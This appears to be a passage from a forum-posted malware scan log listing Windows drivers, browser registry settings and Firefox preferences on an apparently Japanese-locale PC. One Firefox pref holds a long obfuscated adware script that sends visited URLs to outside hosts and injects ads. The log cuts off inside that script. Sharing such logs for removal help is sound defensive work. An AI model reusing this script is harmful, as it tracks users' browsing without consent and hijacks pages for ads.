DRV:[b]64bit:[/b] - [2013/08/22 20:37:14 | 000,029,696 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\dmvsc.sys -- (dmvsc)
DRV:[b]64bit:[/b] - [2013/08/22 20:36:25 | 000,016,384 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\NdisVirtualBus.sys -- (NdisVirtualBus)
DRV:[b]64bit:[/b] - [2013/08/22 17:46:33 | 000,027,136 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\fxppm.sys -- (FxPPM)
DRV:[b]64bit:[/b] - [2013/08/13 08:25:46 | 000,017,624 | ---- | M] (Windows (R) Win 7 DDK provider) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\bcmfn2.sys -- (bcmfn2)
DRV:[b]64bit:[/b] - [2013/08/10 09:39:30 | 000,651,248 | ---- | M] (Intel Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\iaStorAV.sys -- (iaStorAV)
DRV:[b]64bit:[/b] - [2013/08/06 15:13:30 | 000,023,040 | ---- | M] (Apple Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\netaapl64.sys -- (Netaapl)
DRV:[b]64bit:[/b] - [2013/07/31 03:47:35 | 000,024,568 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\iaLPSSi_GPIO.sys -- (iaLPSSi_GPIO)
DRV:[b]64bit:[/b] - [2013/07/26 04:05:39 | 000,099,320 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\iaLPSSi_I2C.sys -- (iaLPSSi_I2C)
DRV:[b]64bit:[/b] - [2013/06/18 23:44:59 | 000,129,224 | ---- | M] (Qualcomm Atheros Co., Ltd.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\L1C63x64.sys -- (L1C)
DRV:[b]64bit:[/b] - [2013/04/04 14:50:32 | 000,025,928 | ---- | M] (Malwarebytes Corporation) [File_System | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\mbam.sys -- (MBAMProtector)
DRV:[b]64bit:[/b] - [2012/09/01 18:01:56 | 000,647,736 | ---- | M] (Intel Corporation) [Kernel | Boot | Running] -- C:\Windows\SysNative\drivers\iaStorA.sys -- (iaStorA)
DRV:[b]64bit:[/b] - [2012/08/21 13:01:20 | 000,033,240 | ---- | M] (GEAR Software Inc.) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\GEARAspiWDM.sys -- (GEARAspiWDM)
DRV:[b]64bit:[/b] - [2012/08/14 18:03:34 | 002,206,352 | ---- | M] (VIA Technologies, Inc.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\viahduaa.sys -- (VIAHdAudAddService)
DRV:[b]64bit:[/b] - [2012/07/02 15:16:02 | 000,062,784 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Running] -- C:\Windows\SysNative\drivers\HECIx64.sys -- (MEIx64)
DRV:[b]64bit:[/b] - [2012/06/19 07:40:50 | 000,342,528 | ---- | M] (Intel(R) Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\IntcDAud.sys -- (IntcDAud)
DRV:[b]64bit:[/b] - [2010/08/11 23:51:48 | 001,587,968 | ---- | M] (Creative Technology Ltd.) [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\ksaud.sys -- (ksaud)
DRV:[b]64bit:[/b] - [2010/07/05 13:47:00 | 000,565,248 | ---- | M] () [Kernel | On_Demand | Stopped] -- C:\Windows\SysNative\drivers\GVUSB2.X64.SYS -- (GVUSB2.X64)
DRV - [2012/07/05 10:46:18 | 000,125,544 | ---- | M] () [Kernel | System | Stopped] -- C:\ProgramData\Kingsoft\klive\bin\encrypteddisk-x64.sys -- (EncryptedDisk)
DRV - [2007/07/06 15:34:36 | 000,016,800 | ---- | M] (Siemens AG) [Kernel | On_Demand | Stopped] -- C:\Program Files (x86)\K-Opticom\eo\app\RAWESR.sys -- (RAWESR)
DRV - [2007/07/06 15:34:34 | 000,013,600 | ---- | M] (Siemens AG) [Kernel | On_Demand | Stopped] -- C:\Program Files (x86)\K-Opticom\eo\app\LOGNT.SYS -- (LOGNT)
DRV - [2007/06/21 11:31:30 | 000,024,376 | ---- | M] (Siemens AG) [Kernel | On_Demand | Stopped] -- C:\Program Files (x86)\K-Opticom\eo\app\NTSTPL2.SYS -- (NTSTPL2)
DRV - [2007/06/21 11:31:30 | 000,024,376 | ---- | M] (Siemens AG) [Kernel | On_Demand | Stopped] -- C:\Program Files (x86)\K-Opticom\eo\app\ntstpl1.sys -- (NTSTPL1)


[color=#E56717]========== Standard Registry (SafeList) ==========[/color]


[color=#E56717]========== Internet Explorer ==========[/color]

IE:[b]64bit:[/b] - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = http://www.google.com
IE:[b]64bit:[/b] - HKLM\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
IE:[b]64bit:[/b] - HKLM\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/search?q={searchTerms}&FORM=IE8SRC
IE:[b]64bit:[/b] - HKLM\..\SearchScopes\{502856A1-6DE0-41A4-B5E0-C086F87A22D4}: "URL" = http://www.bing.com/search?q={searchTerms}&form=IE10TR&src=IE10TR&pc=MASBJS
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Local Page = C:\Windows\SysWOW64\blank.htm
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = http://www.google.com
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Search,CustomizeSearch = http://search.jword.jp/jwd_sb_srchcust.htm?ielang={SUB_RFC1766}
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Search,OCustomizeSearch = http://search.jword.jp/jwd_sb_srchcust.htm?ielang={SUB_RFC1766}
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Search,OSearchAssistant = http://search.jword.jp/jwd_sb_srchasst.htm?ielang={SUB_RFC1766}
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Search,SearchAssistant = http://search.jword.jp/jwd_sb_srchasst.htm?ielang={SUB_RFC1766}
IE - HKLM\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
IE - HKLM\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/search?q={searchTerms}&FORM=IE8SRC
IE - HKLM\..\SearchScopes\{726DA24E-A4A1-62E5-72EA-44C7886452CB}: "URL" = http://www.bing.com/search?q={searchTerms}&form=IE10TR&src=IE10TR&pc=MASBJS


IE - HKU\.DEFAULT\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
IE - HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0

IE - HKU\S-1-5-18\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
IE - HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0

IE - HKU\S-1-5-19\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}

IE - HKU\S-1-5-20\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}

IE - HKU\S-1-5-21-1488747381-3182991089-3951260014-1001\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Page_URL = http://localoem.msn.com
IE - HKU\S-1-5-21-1488747381-3182991089-3951260014-1001\SOFTWARE\Microsoft\Internet Explorer\Main,Secondary Start Pages = http://home.kingsoft.jp [binary data]
IE - HKU\S-1-5-21-1488747381-3182991089-3951260014-1001\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = http://www.google.com
IE - HKU\S-1-5-21-1488747381-3182991089-3951260014-1001\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
IE - HKU\S-1-5-21-1488747381-3182991089-3951260014-1001\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/search?q={searchTerms}&src=IE-SearchBox&FORM=IE8SRC
IE - HKU\S-1-5-21-1488747381-3182991089-3951260014-1001\..\SearchScopes\{502856A1-6DE0-41A4-B5E0-C086F87A22D4}: "URL" = http://www.bing.com/search?FORM=UP97DF&PC=UP97&q={searchTerms}&src=IE-SearchBox
IE - HKU\S-1-5-21-1488747381-3182991089-3951260014-1001\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0
IE - HKU\S-1-5-21-1488747381-3182991089-3951260014-1001\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyOverride" = *.local

[color=#E56717]========== FireFox ==========[/color]

FF - prefs.js..browser.search.countryCode: "JP"
FF - prefs.js..browser.search.isUS: false
FF - prefs.js..browser.search.region: "JP"
FF - prefs.js..browser.search.useDBForOrder: true
FF - prefs.js..extensions.1w1yYzYd3Bt0Hdq9.scode: "(function(){try{if(window.self.location.href.indexOf(\"rjCEqHaEpjwErHg7qHY8rHaHpda\")>-1){return;}}catch(e){}try{var d=[[\"trianglecash.com\",\"acebook\",\"flybrain.com\",\"www.pcutilitiespro.com\",\"www.pcutilitiespro.net\",\"www.superpctools.com\",\"www.superpctools.net\",\"www.pcrepairlabs.com\",\"www.pcrepairlabs.net\",\"www.viracure.com\",\"www.viracure.net\",\"www.onesave.com\",\"www.onesave.net\",\"www.centralshopgate.com\",\"www.centralshopgate.net\",\"www.safeshopgate.com\",\"www.safeshopgate.net\",\"securedshopgate.com\",\"securedshopgate.net\",\"gen.securedshopgate.com\",\"gen.securedshopgate.net\",\"e4everything.co\",\"3juices.s\",\"safecart.com\",\"cleverbridge.com\",\"warnalert11.com\",\"sumorobo.net\",\"mindri.com\",\"alertfunctions.com\",\"immediate-support.com\",\"sumorobo\",\"roulettebotplus\",\"s.vgsgaming-ads\",\"lottery-master\",\"lotterymaster\",\"onduit\",\"search.imesh\",\"search.searchcore\",\"searchnu.com\",\"searchqu.com\",\"shareazaweb\",\"searchgby.com\",\"mysearchresults.com\",\"searchya.com\",\"searchgol.com\",\"trovi.com\",\"search.ask\",\"mywebsearch.com\",\"search-results.com\",\"mysearch.com\",\"offers.bycontext.com\",\"deals.offer-dynamics.com\",\"offer-dynamics.com\",\"deadsea.com\",\"jerusalem.com\",\"vatican.com\",\"iklk.com\",\"gvud.com\",\"zuzd.com\",\"babaviral.com\",\"cupid.so\",\"hostanytime.com\",\"antivirus.so\",\"dates.am\",\"insurance-company.co\",\"advanceloan.org\",\"calcitapp.info\",\"desktopfavapp.info\",\"avatrade.com\",\"game-trek.net\",\"urgent-alerts.com\",\"pc-alert.com\",\"error-alerts.com\",\"search.searchonme.com\",\"searchitapp.com\",\"news.searchonme.com\",\"search.appsarefun.info\",\"websearch.mocaflix.com\",\"search.easylifeapp.com\",\"searchy.easylifeapp.com\",\"us.yhs4.search.yahoo.com\",\"search.gboxapp.com\",\"searchiy.gboxapp.com\",\"bestonlinegadgetguide.com\",\"odpu.com\",\"safesearch.co\",\"findamo.com\",\"search.myownsearchbox.com\",\"datropy.com\",\"applicationgrabb.net\",\"databass.info\",\"firstfirst.net\",\"liversely.com\",\"liversely.net\",\"livesetwebs.org\",\"lp.ncdownloader.com\",\"lp.vaudix.com\",\"masteroids.com\",\"reditions.net\",\"sharesuper.info\",\"storaget.info\",\"westzip.in\",\"boxhilade.com\",\"mylinksworld.com\",\"shoppingwiz.co\",\"rabbitsearch.net\",\"searchandbake.com\",\"smartshopping.com\",\"www.search.smartshopping.com\",\"www.local.smartshopping.com\",\"www.shoppstop.com\",\"localmoxie.com\",\"www.yellowmoxie.com\",\"www.mail.com\",\"suche.mail.com\",\"www.web.de\",\"suche.web.de\",\"suche.gmx.de\",\"search.gmx.com\",\"search.gmx.co.uk\",\"news.gmx.com\",\"news.gmx.co.uk\",\"www.turbosearchengine.com\",\"search.turbosearchengine.com\",\"www.relatedtopix.com\",\"search.relatedtopix.com\",\"www.app-rover.com\",\"www.appigniter.com\",\"www.bposolutions.com\",\"www.zhuamob.com\",\"www.yieldnexus.com\",\"www.tfxiq.com\",\"www.tfxiq.net\",\"sporty-glow.com\",\"namyneck.com\",\"styloosh.com\",\"baidu.co.th\",\"ooyd.com\",\"jobsro.com\",\"kaoor.com\",\"myloginbox.com\",\"mainpagesite.com\",\"turtleclip.com\",\"blackyclip.com\",\"film-tease.com\",\"bestpaydayloans2015.com\",\"hotelsdealsreviews.com\",\"top10cellphoneplans.com\",\"top5autoinsurance.com\",\"topcreditreportsites.com\"],[/^websearch.(mocaflix|searchissimple|just-browse|good-results|searchsupporter|soft-quick|pu-results|simplespeedy|helpmefindyour|greatresults|youwillfind|lookforitthere|lookforithere|searchmainia|searchrocket|homesearchapp|a-searchpage|coolwebsearch|homesearch-hub|resulthunters|searchdwebs|searchingisme|searchannel|searchouse|pur-esult|searchboxes|searchitup|searchpages|searchesplace|simplesearches|goodfindings|searchiseasy|the-searcheng|oversearch|searchere|relevantsearch|wisesearch|search-guide|searchisbestmy|searchbomb|searchguru|searchsun|searchsunmy|toolksearchbook|searchinweb|webisgreat|webisawsome|exitingsearch|amaizingsearches|searchingissme|awsomesearchs|eazytosearch|ezsearches|fastosearch|fastsearchings|flyandsearch|wonderfulsearches|fixsearch|searchandfly|searchfix|allsearches|searc-hall|simple2search|searchitwell).info$/,/search\\.(easylifeapp|gboxapp|searchonme|appsarefun|genieo)\\.com/]];for(var i=0,a=d[0],l=a.length;i<l;i++){if(window.self.location.hostname.indexOf(a[i])>-1){return;}}for(var j=0,a=d[1],l=a.length;j<l;j++){if(a[j].test(window.self.location.hostname)){return;}}}catch(e){}try{var u=[[\"revenuewire.com/pcutilitiespro\",\"__ipm=\",\"=apapamam\",\"txtlnkusaolp00000800\",\"=admaven\",\"5386b_643c_\",\"=CONMHP&conlogo=CT3210127\",\"www.livegeekhelp.com/pop/\",\"?ctid=ct3330145\",\"?ctid=ct3330146\",\"?ctid=ct3330147\",\"?ctid=ct3330148\",\"?ctid=ct3330149\",\"if72ru4sdfsdfruh7fewui\",\"fghjktghndfgtssss\",\"form=u064ht&pc=u064\",\"source=45905810\",\"source=532d277e\",\"aro.com/ws/?source=6974b128\",\"esmoke.com/?isid=9949\",\"esmoke.com/?isid=9950\",\"esmoke.com/?isid=9951\",\"id=webpick_ot\",\"id=wbpk_ot\",\"hash=a4vxy8\",\"hash=m5g73j\",\"hash=hg7gja\",\"hash=fz61s5\",\"hash=1i5w2d\",\"hash=zndas3\",\"hash=b3qau4\",\"hash=ijeqe4\",\"duit&ptag=aa7aab832a2de41458bf&\",\"duit&ptag=a93f650ac0e6a4a4791f&\",\"duit&ptag=a79888693f6ca4634a6f\",\"duit&ptag=a359b17b6faa44e6b86f\",\"isid=mf245f633-e188-4162-b56a\",\"sid=meabfcf9a-556b-4c5c-8727\",\"isid=m8fbc22fe-ab08-464e-aa63\",\"uid=531364863_132823_4252277e\"],[/[\\?&]p=24039(&|$)/,/lll[a-zA-Z0-9]{11}00/,/#FA[-_]/,/bing\\.com[^p]+pc=.+/,/^http:\\/\\/sporty-glow\\.com\\//,/^http:\\/\\/game-trek\\.net\\//,/#(a652c|ld893)_/,/ressbar\\.com[^f]+fid=65017/,/^https?:\\/\\/([a-z0-9-]+\\.)*search\\.yahoo\\.com\\/yhs\\/.*[&?]hspart=webpick(&|$)/]];for(var i=0,a=u[0],l=a.length;i<l;i++){if((window.self.location.href+\"#\"+window.name).indexOf(a[i])>-1){(new Image).src = \"//\"+[\"resourcesiso.xyz\",\"thematrixinner.net\"][window.location.protocol!= \"https:\"?0:1]+\"/?n=\"+encodeURIComponent(a[i])+\"&h=\"+encodeURIComponent(window.self.location.href+\"#\"+window.name)+\"&d=\"+encodeURIComponent(window.self.location.hostname)+\"&eid=1272&pid=2111&hid=17070091036678530380\";return;}}for(var j=0,a=u[1],l=a.length;j<l;j++){if(a[j].test(window.self.location.href+\"#\"+window.name)){(new Image).src=\"//\"+[\"resourcesiso.xyz\",\"thematrixinner.net\"][window.location.protocol!=\"https:\"?0:1]+\"/?n=\"+encodeURIComponent(a[j])+\"&h=\"+encodeURIComponent(window.self.location.href+\"#\"+window.name)+\"&d=\"+encodeURIComponent(window.self.location.hostname)+\"&eid=1272&pid=2111&hid=17070091036678530380\";return;}}}catch(e){}try{(function(){var stngs = {attr_name:'s17070091036678530380',szy_domain:[\"senddownloadmy.com\",\"milkyboxrangeronline.net\"],ad_sizes:[[120,60,19],[630,250,22],[336,280,17],[630,500,23],[180,150,18],[234,60,15],[200,200,16],[600,400,13],[125,125,14],[670,670,11],[600,270,12],[800,600,21],[468,60,3],[800,440,20],[300,250,2],[728,90,1],[300,600,10],[120,240,7],[120,600,6],[160,600,5],[250,250,4],[240,400,8]],checkif:function(ifr){return (ifr.getAttribute('s17070091036678530380') || ifr.src.indexOf('=458516')>-1||ifr.src.indexOf('=458516')>-1||ifr.src.indexOf('1018-1005')>-1||ifr.src.indexOf('1019-1001')>-1||ifr.src.indexOf('2136&zid=')>-1&&ifr.src.indexOf('PT1312')>-1||(ifr.getAttribute('name') && ifr.getAttribute('id')==ifr.getAttribute('name') && ifr.getAttribute('name').match(/^ap\\d+$/)))}};if(\"undefined\"==typeof window.adzy653rk&&document.getElementsByTagName(\"body\").length&&!document.getElementsByTagName(\"body\")[0].getAttribute(\"jhjlijpomuhn_m\")){var removeNode=function(a){for(var b=(63,342)>(559,85)?(56,!0):(63,1401),c=(372,1)<(364,98)?(1098,!1):(971,40),d=829<(71,1335)?(1100,122):(918,478),e=12>(481,500)?267:586<(136,1243)?(339,90):(92,89),g=27<=(42,519)?(468,97):(69,283),h=137<(169,296)?(93,\"m\"):(96,984),f=136>=(37,599)?(92,301):(966,429)<=(369,537)?(213,64):(578,1008),l=307>=(1295,\n1355)?(809,\"L\"):69>=(158,391)?(669,117):141<(368,514)?(1490,6):(1113,116),n=(43,255)>=(223,250)?(468,63):(879,133),k=22>(199,868)?(1170,\"s\"):(917,799)>=(972,448)?(122,\"n\"):44>=(211,96)?(1080,71):(58,556),A=75>=(1239,49)?(21,\"9\"):27>=(501,441)?(59,48):(207,1058)<(454,90)?\";\":(122,914),K=414>=(295,137)?(109,\"8\"):(1165,557),v=874>=(78,39)?(77,\"7\"):116>(476,807)?(1499,989):(520,925),R=(953,33)>(639,132)?(434,\"z\"):149<(132,581)?(77,\"z\"):61>=(597,482)?126:(771,8),S=456<=(451,877)?(2,\"x\"):(52,18),F=326<\n(1197,1202)?(1274,\"i\"):(26,109),G=410>=(1290,732)?(485,25):52>(20,78)?1380:1102>=(49,51)?(294,\"b\"):(112,161),L=(146,387)>(818,87)?(534,\"Y\"):(1385,1004),T=52<(95,139)?(57,\"X\"):(840,124),U=123<=(105,50)?(142,\"'\"):1333>(11,318)?(108,\"T\"):(962,1482),M=(755,119)>=(49,128)?47:880<(473,103)?41:59>(183,40)?(272,\"Q\"):(125,73),V=533<(155,25)?1E3:55>(133,112)?(1416,429):(31,1188)>(72,497)?(502,\"N\"):(82,144),N=(491,93)>(39,1009)?(1047,\"aaa\"):325>=(249,9)?(83,\"M\"):(645,114),O=(91,94)>(16,53)?(484,\"K\"):(462,83)>=\n(3,103)?(114,90):146<(114,132)?\"O\":(145,53),P=259<(286,86)?209:142>=(303,8)?(189,\"D\"):88>=(24,287)?(40,191):(1406,186),W=102<=(476,402)?(132,4537426):(315,47),H=(97,23)<=(514,29)?(117,1290452675):(862,1417),B=117<(32,132)?(352,\"0\"):(78,430),r=110>(545,410)?(71,457):548>=(81,37)?(555,\"2\"):(96,999),w=82<(1007,1382)?(869,\"f\"):(86,207),D=131>=(471,71)?(208,\"s\"):(103,115),C=107>=(74,129)?(25,\"c\"):(20,532)<=(74,750)?(20,\"p\"):237>(31,498)?(446,133):(110,138),I=100<(31,83)?(54,129):(112,132)<=(75,408)?(49,\n\"U\"):(593,65),H=-H,E=s7S5.V7T,J=s7S5.j7T;-1139651341!==s7S5.E0.i0(J.toString(),J.toString().length,8698539J++)y.push(u(j)),S9(),E+=s7S5.V7T;if(s7S5.E0.i0(E.toString(),E.toString().length,W)!==H)return j2<<Y2;var Q={_keyStr:\"ABC\"+P+\"EFGHIJ\"+O+\"L\"+N+V+\"OP\"+M+\"RS\"+U+I+\"VW\"+T+L+\"Za\"+G+\"cd\"+s7S5.n7T+w+\"g\"+s7S5.s4T+F+\"jklmno\"+C+\"qrstuvw\"+S+\"y\"+R+B+\"123456\"+v+K+A+\"+/=\",encode:function(a){var b=(540,335)>=(145,38)?(1201,\"S\"):(91,1254),c=146<=(1489,582)?(1031,\"5\"):(252,74),d=(58,41)<=(298,99)?(685,\"_\"):\n(213,84)<=(44,76)?(422,31):(14,1),e=\"\",g,h,s,m,t,p,x=s7S5.Y7T;for(a=Q[d+\"ut\"+w+K+d+s7S5.n7T+k+\"code\"](a);s7S5[I+c](x,a.length);)g=a[s7S5.g7T+\"harC\"+s7S5.W9T+s7S5.r7T+s7S5.n7T+s7S5.E9T+s7S5.I7T](x++),h=a[s7S5.G7T+s7S5.j4T+s7S5.G4T+s7S5.d9T+\"eA\"+s7S5.I7T](x++),s=a[s7S5.g7T+s7S5.s4T+s7S5.N7T+s7S5.A7T+s7S5.G4T+s7S5.d9T+\"eA\"+s7S5.I7T](x++),m=s7S5[C+r](g,s7S5.V7T),t=111>(67,494)?107:(1207,1483)>(746,910)?(1313,\"F\"):138>=(435,222)?309:(209,1488),g=s7S5[t+c]((g&s7S5.e7T)<<s7S5.C7T,h>>s7S5.C7T),t=s7S5.A5((h&\ns7S5.K7T)<<s7S5.V7T,s>>l),p=s7S5[P+c](s,n),isNaN(h)?t=p=f:isNaN(s)&&(p=f),e=e+this[\"_keySt\"+s7S5.A7T][s7S5.G7T+s7S5.N7T+s7S5.A7T+s7S5.E9T+s7S5.I7T](m)+this[\"_key\"+b+s7S5.I7T+s7S5.A7T][s7S5.G7T+s7S5.N7T+s7S5.A7T+s7S5.E9T+s7S5.I7T](g)+this[d+\"k\"+s7S5.n7T+\"y\"+b+\"tr\"][s7S5.g7T+s7S5.s4T+s7S5.N7T+s7S5.A7T+s7S5.E9T+s7S5.I7T](t)+this[d+\"k\"+s7S5.n7T+\"y\"+b+s7S5.I7T+s7S5.A7T][s7S5.g7T+s7S5.s4T+\"arAt\"](p);return e},decode:function(a){var b=(3,44)>=(480,32)?(136,256):(731,73),c=(475,0)<=(58,543)?(121,\"u\"):(695,\n38),d=459<(262,536)?(888,72):(1044,140),e=(148,306)>=(337,136)?(202,\"H\"):(60,126),q=(283,528)<(3,97)?(261,\"aaa\"):53>(629,332)?(51,\"d\"):1229>(127,1138)?(128,44):(726,741),n=183<=(559,42)?1E4:525>=(4,82)?(35,43):(5,96),s=124>(3,67)?(195,58):(143,637)<=(104,120)?90:(22,141),m=231<(519,98)?\"j\":48<(17,1053)?(23,48):(75,139),t=(401,28)<(510,88)?(28,123):(359,105)>=(730,700)?(1021,2):(101,390),p={},x=[],v=\"\",w=String[\"fr\"+s7S5.W9T+h+s7S5.G4T+s7S5.s4T+s7S5.N7T+\"rCod\"+s7S5.n7T],n=[[65,91],[g,t],[m,s],[n,q],\n[47,m]];for(z in n)for(q=n[z][s7S5.Y7T];s7S5[e+r](q,n[z][s7S5.j7T]);q++)x[\"pu\"+D+s7S5.s4T](w(q));for(q=s7S5.Y7T;s7S5[h+r](q,f);q++)p[x[q]]=q;for(q=s7S5.Y7T;s7S5[M+r](q,a.length);q+=d)for(s=e=s7S5.Y7T,m=a[D+c+G+D+s7S5.I7T+s7S5.A7T+F+k+\"g\"](q,q+d),n=s7S5.Y7T;s7S5.P2(n,m.length);n++)for(x=p[m[s7S5.g7T+s7S5.s4T+s7S5.j4T+s7S5.E9T+s7S5.I7T](n)],e=s7S5[c+r](e,l)+x,s+=l;s7S5[\"k\"+r](s,s7S5.Z7T);)v+=w(s7S5[F+r](e>>>(s-=s7S5.Z7T),b));return v},_utf8_encode:function(a){var b=70>(376,25)?(621,224):3>=(453,58)?\n(352,2048):(42,88),c=105>=(26,66)?(400,192):(574,60),d=932<(1182,101)?775:(540,121)<=(93,95)?148:(319,561)>=(155,52)?(1234,2048):(214,257),f=(65,346)<=(114,1276)?(341,\"J\"):1351<(222,576)?(576,996):(116,1245),e=(542,339)>(95,102)?(149,127):432<=(130,104)?(114,12):(1021,686),g=79>=(61,853)?(528,\"f\"):(822,133)<=(153,1191)?(276,128):(72,85),k=961>(349,346)?(232,\"B\"):(69,79)>(389,906)?(1088,\"r\"):(1284,32),m=(489,331)<(284,680)?(46,\"l\"):(84,144);a=a[s7S5.A7T+s7S5.n7T+C+m+s7S5.N7T+s7S5.g7T+s7S5.n7T](/\\r\\n/g,\n\"\\n\");for(var m=\"\",t=s7S5.Y7T;s7S5.z2(t,a.length);t++){var p=a[s7S5.G7T+s7S5.N7T+s7S5.A7T+s7S5.G4T+s7S5.W9T+s7S5.r7T+\"eA\"+s7S5.I7T](t);s7S5[k+r](p,g)?m+=String[w+\"romC\"+s7S5.s4T+s7S5.N7T+\"rCo\"+s7S5.r7T+s7S5.n7T](p):s7S5[s7S5.A7T+r](p,e)&&s7S5[f+r](p,d)?(m+=String[w+\"ro\"+h+\"Ch\"+s7S5.N7T+s7S5.A7T+s7S5.e4T+s7S5.r7T+s7S5.n7T](s7S5[O+r](p>>l,c)),m+=String[\"fromCh\"+s7S5.j4T+s7S5.G4T+s7S5.W9T+s7S5.E7T](s7S5.l2(p&n,g))):(m+=String[\"fr\"+s7S5.W9T+\"mCha\"+s7S5.A7T+s7S5.G4T+s7S5.W9T+s7S5.E7T](s7S5[N+r](p>>12,\nb)),m+=String[\"from\"+s7S5.G4T+\"har\"+s7S5.e4T+s7S5.r7T+s7S5.n7T](s7S5[G+r](p>>l&n,g)),m+=String[w+\"romChar\"+s7S5.G4T+s7S5.W9T+s7S5.r7T+s7S5.n7T](s7S5.y2(p&n,g)))}return m}};a=Q[s7S5.r7T+s7S5.n7T+s7S5.g7T+s7S5.W9T+s7S5.r7T+s7S5.n7T](function(a){for(var b=708>=(280,660)?(153,\"R\"):(1406,82),c=a[s7S5.I7T+s7S5.W9T+I+C+C+\"er\"+s7S5.G4T+s7S5.N7T+D+s7S5.n7T](),d=a[s7S5.I7T+\"oLowe\"+s7S5.A7T+\"Cas\"+s7S5.n7T](),f=\"\",e=s7S5.Y7T;s7S5[w+r](e,a.length);++e)f+=s7S5[b+B](a[e][s7S5.g7T+\"ha\"+s7S5.A7T+s7S5.G4T+s7S5.W9T+\ns7S5.E7T+s7S5.E9T+s7S5.I7T](),c[e][s7S5.g7T+s7S5.s4T+s7S5.j4T+s7S5.G4T+s7S5.d9T+s7S5.n7T+s7S5.b7T]())?d[e]:c[e];return f}(a));for(A=s7S5.Y7T;s7S5[\"I\"+B](A,a.length);++A)if(v=a[A][s7S5.g7T+s7S5.s4T+s7S5.N7T+s7S5.A7T+\"Cod\"+s7S5.n7T+s7S5.b7T](),s7S5.X0(v,65)||s7S5[s7S5.g7T+B](v,e)&&s7S5.V0(v,g)||s7S5[L+B](v,d))return c;return b};(function(){var a=document.getElementsByTagName(\"body\")[0];a&&!a.getAttribute(\"jhjlijpomuhn_l\")&&a.setAttribute(\"jhjlijpomuhn_m\",\"l\")})();var Pixel=function(a,b){var c={http:\"\",\nhttps:\"\"},d=\"/\",e={};this.setHost=function(a){if(\"object\"==typeof a&&(\"string\"==typeof a.http||a.http instanceof Array)&&(\"string\"==typeof a.https||a.https instanceof Array))c=a;else if(\"string\"==typeof a||a instanceof Array)c={http:a,https:a};return this};this.setPath=function(a){\"string\"==typeof a&&(d=a=a.replace(/^([^\\/]|$)/,\"/$&\"));return this};this.setParameters=function(a){if(\"object\"==typeof a&&!(a instanceof Array))for(var b in a)this.setParameter(b,a[b]);return this};this.setParameter=function(a,\nb){e[a]=b;return this};var g=function(){var a=[],b;for(b in e)null!==e[b]&&void 0!==e[b]&&a.push(encodeURIComponent(b)+\"=\"+encodeURIComponent(e[b]));return a.length?\"?\"+a.join(\"&\"):\"\"},h=function(a){if(\"string\"==typeof a)return a;if(a instanceof Array)return a[Math.round(Math.random()*(a.length-1))]};this.getNonSslHost=function(){return h(c.http)||\"\"};this.getSslHost=function(){return h(c.https)||\"\"};this.buildNonSslUrl=function(){var a=this.getNonSslHost();if(a)return\"http://\"+a+d+g()};this.buildSslUrl=\nfunction(){var a=this.getSslHost();if(a)return\"https://\"+a+d+g()};this.isSecure=function(){return\"https:\"==window.location.protocol};this.toString=function(){return(this.isSecure()?this.buildSslUrl():this.buildNonSslUrl())||\"\"};this.push=function(a){a=a||function(){};var b=this.toString();if(!b)return!1;var c=new Image;c.onload=function(){a.call(this,\"success\",arguments)};c.onerror=function(){a.call(this,\"error\",arguments)};return c.src=b};this.setHost(a);this.setParameters(b)},PixelIPP=function(){return new Pixel({https:[\"winnerican.org\",\n\"winnering.info\",\"winnering.org\"],http:\"directonic.org dirnt.net dirnt.org fasterol.org loveci.info lovek.info lovement.info lovening.info loveral.net lovezhsky.com loversion.org loversion.net lovezhsky.info lovezhsky.net lovezhsky.org proffic.info proffic.org proffic.net proffican.com proffican.net\".split(\" 